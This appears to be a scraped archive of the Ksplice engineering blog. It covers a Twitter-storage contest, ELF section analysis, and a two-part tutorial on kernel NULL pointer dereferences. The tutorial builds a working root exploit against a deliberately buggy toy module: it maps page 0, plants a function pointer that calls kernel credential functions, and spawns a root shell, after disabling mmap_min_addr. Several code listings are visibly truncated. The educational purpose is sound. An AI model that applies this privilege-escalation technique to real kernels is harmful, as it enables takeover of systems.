    The guys from previously made a whole Twitter filesystem, outlined in this video. The took advantage of the UCS-4 trick to update their program. They thew in a bunch of clever tricks of their own: storing data in the latitude and longitude, and 7 bits in the place_id field. The cherry on top: representing one bit in whether the tweet is "favorited"! All told, by dc949's count, this gets you to 4,368 bits.

    The downside: in our testing, their implementation didn't quite work. Fed with random bits, we often got truncated or incorrect results (even with an updated version dc949 supplied). The bugs can probably be fixed, but until that happens we can't quite confirm that all these fields store as many bits as dc949 believes.

  • Ben Savage

    We liked Ben's entry too much not to give him a T-shirt:

    Solution - Just tweet the following picture of a swimming fish:
    Given that 1 word is 16 bits, and a picture is equal to 1,000 words,
    that makes my above tweet 16,000 bits of information (fitting
    several pictures in a tweet may extend this further) :-)

Thanks again to all who participated! Until next time...


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
typedef int (*commit_creds_t)(struct cred *new)

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;

/* This function will be executed in kernel mode. */
void get_root(void) {

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);

  fprintf(stderr, "Something went wrong?\n");
  return 1;

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Saturday Apr 10, 2010

Reminder: Last day for Longest Tweet Contest entries

Reminder: The entry period for the 1st International Longest Tweet Contest closes today. Good luck!


Monday Apr 05, 2010

Hello from a libc-free world! (Part 2)

In the previous post we conquered compilation by constructing a small program that can be compiled without using libc. Understanding object code and the details of an ELF executable are the next step in our adventure.

We left off with the following program pieces:

jesstess@kid-charlemagne:~$ cat stubstart.S
.globl _start _start: call main movl $1, %eax xorl %ebx, %ebx int $0x80
jesstess@kid-charlemagne:~$ cat hello.c
int main() { char *str = "Hello World"; return 0; }
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S hello.c -o hello
What did all that work get us?
jesstess@kid-charlemagne:~/c$ wc -c hello
1373 hello
jesstess@kid-charlemagne:~$ objdump -D hello | wc -l
We're down to a little over 1300 bytes of executable and what at under 100 lines seems like a very reasonable amount of assembly to dissect. Since no little bit of assembly is going to scare us at this point, let's look at the assembly now, with objdump -D so we see the assembly for all sections (output here). If it looks intimidating at first, just give it a quick once-over and I promise it won't be by the end of this post.

Alright, we have 5 sections: .text, which contains the familiar _start and main symbols, .rodata, .eh_frame_hdr, .eh_frame, and .comment.

Step 1: Back up - what the heck is a "section"?

If we dust off our favorite copy of the Tool Interface Standard ELF Specification and have a look inside, it tells us this:

An ELF executable like the result of our compilation has two views: it has a program header describing the segments, which contain information used at run-time, and a section header describing the sections, which contain information for linking and relocation. We can look at the program header's segment information or the section header's section information with readelf -l or readelf -S, respectively (output here). The output from these commands on our program is summarized in Figure 1. We won't worry about segments again during this post.

ELF segments and sections Figure 1: our ELF segments and sections

Step 2: What goes in our sections?

The specification also tells us what goes where in our executable:

.text: The executable instructions for a program.

.rodata: Constant data. This is the "read-only data" segment.

.eh_frame: Information necessary for frame-unwinding during exception handling.

.eh_frame_hdr: To quote the Linux Standard Base Specification: "This section contains a pointer to the .eh_frame section which is accessible to the runtime support code of a C++ application. This section may also contain a binary search table which may be used by the runtime support code to more efficiently access records in the .eh_frame section."

We don't have to worry about exceptions with this example, so .eh_frame and .eh_frame_hdr aren't doing much that we care about, and on this machine, compiling with -fno-asynchronous-unwind-tables will suppress creation of these two sections.

.comment: Compiler version information.

Speaking of getting rid of sections: for those of us with a minimalist aesthetic, strip(1) is our friend. We can --remove-section on non-essential sections like .comment to get rid of them entirely; file(1) will tell us if an ELF executable has been stripped.

Other common sections we don't see with our example because they'd be empty:

.data: Initialized global variables and initialized static local variables.

.bss: Uninitialized global and local variables; filled with zeroes. A popular section to bring up during CS interviews!

That's the story on sections. Now, we know that symbols, like _start and main, live in these sections, but are there any more symbols in this program?

Step 3: Understand the symbols and why they live where they live.

We can get symbol information for our executable with objdump -t:
jesstess@kid-charlemagne:~/c$ objdump -t hello
hello:     file format elf64-x86-64

00000000004000e8 l    d  .text                   0000000000000000 .text
0000000000400107 l    d  .rodata                 0000000000000000 .rodata
0000000000400114 l    d  .eh_frame_hdr           0000000000000000 .eh_frame_hdr
0000000000400128 l    d  .eh_frame               0000000000000000 .eh_frame
0000000000000000 l    d  .comment                0000000000000000 .comment
0000000000000000 l    df *ABS*                   0000000000000000 hello.c
00000000004000e8 g       .text                   0000000000000000 _start
0000000000600fe8 g       *ABS*                   0000000000000000 __bss_start
00000000004000f4 g     F .text                   0000000000000013 main
0000000000600fe8 g       *ABS*                   0000000000000000 _edata
0000000000600fe8 g       *ABS*                   0000000000000000 _end
The symbol table for our executable has 11 entries. Weirdly, only rare versions of the objdump man page, like this one, will actually explain the symbol table column by column. It breaks the table down as follows:

Column 1: the symbol's value/address.
Column 2: a set of characters and spaces representing the flag bits set for the symbol. There are 7 groupings, three of which are represented in this symbol table. The first can be l, g, <space>, or !, if the symbol is local, global, neither, or both, respectively. The sixth can be d, D, or <space>, for debugging, dynamic, or normal, respectively. The seventh can be F, f, O, or <space>, for function, file, object, or normal symbol, respectively. Descriptions of the 4 remaining grouping can be found in that unusally comprehensive objdump manpage.
Column 3: which section the symbol lives in. *ABS*, or absolute, means the symbol is not associated with a certain section.
Column 4: the symbol's size/alignment.
Column 5: the symbol's name.

Our 5 sections all have associated local (l) debugging (d) symbols. main is indeed a function (F), and hello.c is in fact a file (f), and it isn't associated with any particular section (*ABS*). _start and main are part of the executable instructions for our program and thus live in the .text section as we'd expect. The only oddities here are __bss_start, _edata, and _end, all *ABS*olute, global symbols that we certainly didn't write into our program. Where did they come from?

The culprit this time is the linker script. gcc implicitly called ld to do the linking on this machine as part of the compilation process. ld --verbose will spit out the linker script that was used, and looking at this script (output here) we see that _edata is defined as the end of the .data section, and __bss_start and _end mark the beginning and end of the .bss section. These symbols could be used by memory management schemes (for example if sbrk wants to know where the heap could start) and garbage collectors.

Note that str, our initialized local variable, doesn't show up in the symbol table. Why? Because it gets allocated on the stack (or possibly in a register) at runtime. However, something related to str is in the .rodata section, even though we don't see it in the symbol table...

With char *str = "Hello, World"; we're actually creating two different objects. The first is the string literal "Hello, World", which is just that array of characters, and has some address but no explicit way of naming it. That array is read-only and lives in .rodata. The second is the local variable str, which is of type "pointer to char". That is what lives on the stack. Its initial value is the address of the string literal that was created.

We can prove this, and see some other useful information, by looking at the contents of our sections with the strings decoded:
jesstess@kid-charlemagne:~$ objdump -s hello

hello:     file format elf64-x86-64

Contents of section .text:
 4000e8 e80b0000 00b80100 000031db cd809090  ..........1.....
 4000f8 554889e5 48c745f8 0b014000 b8000000  UH..H.E...@.....
 400108 00c9c3                               ...             
Contents of section .rodata:
 40010b 48656c6c 6f20576f 726c6400           Hello World.    
Contents of section .eh_frame_hdr:
 400118 011b033b 14000000 01000000 e0ffffff  ...;............
 400128 30000000                             0...            
Contents of section .eh_frame:
 400130 14000000 00000000 017a5200 01781001  .........zR..x..
 400140 030c0708 90010000 1c000000 1c000000  ................
 400150 f8004000 13000000 00410e10 8602430d  ..@......A....C.
 400160 06000000 00000000                    ........        
Contents of section .comment:
 0000 00474343 3a202855 62756e74 7520342e  .GCC: (Ubuntu 4.
 0010 332e332d 35756275 6e747534 2920342e  3.3-5ubuntu4) 4.
 0020 332e3300                             3.3. 
Voila! Our "Hello World" string is in .rodata, and our .comment section is now explained: it just holds a string with the gcc version used to compile the program.

Step 4: Trim the fat and put it all together

This executable has 5 sections: .text, .rodata, .eh_frame_hdr, .eh_frame, and .comment. Really, only one of them, .text, has assembly that's germane to what this little program does. This can be confirmed by doing an objdump -d (only disassemble those sections which are expected to contain instructions) instead of the objdump -D (disassemble the contents of all sections, not just those expected to contain instructions) done at the beginning of the post and noting that only the content of .text is displayed.

.rodata really only contains the string "Hello World", and .comment really only contains a gcc version string. The "instructions" for those sections seen in the objdump -D output come from objdump treating the hexadecimal representations of the ASCII characters in those strings as instructions and trying to disassemble them. We can convert the first couple of numbers in the .comment section to ASCII characters to prove this. In Python:
>>> "".join(chr(int(x, 16)) for x in "47 43 43 3a 20 28 55 62 75 6e 74 75".split())
'GCC: (Ubuntu'

In .text, _start calls main, and in main a pointer to the memory location where "Hello World" is stored, 0x40010b (where .rodata starts, as seen in the obdjump -D output), is pushed onto the stack. We then return from main to _start, which takes care of returning from the program, as described in Part I.

And that's everything! All sections and symbols are accounted for. Nothing is magic (and I mean magic in a good I-would-ace-this-test way, not a sorry-Jimmy-Santa-isn't-real way). Whew.

Looking at and really understanding the core parts of an ELF executable means that we can add complexity now without cheating our way around parts we don't understand. To that end, stay tuned for Part 3, where we'll stuff this program with a veritable variable smörgåsbord and see where everything ends up in the program's memory.


Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.


One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!



Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.


« July 2014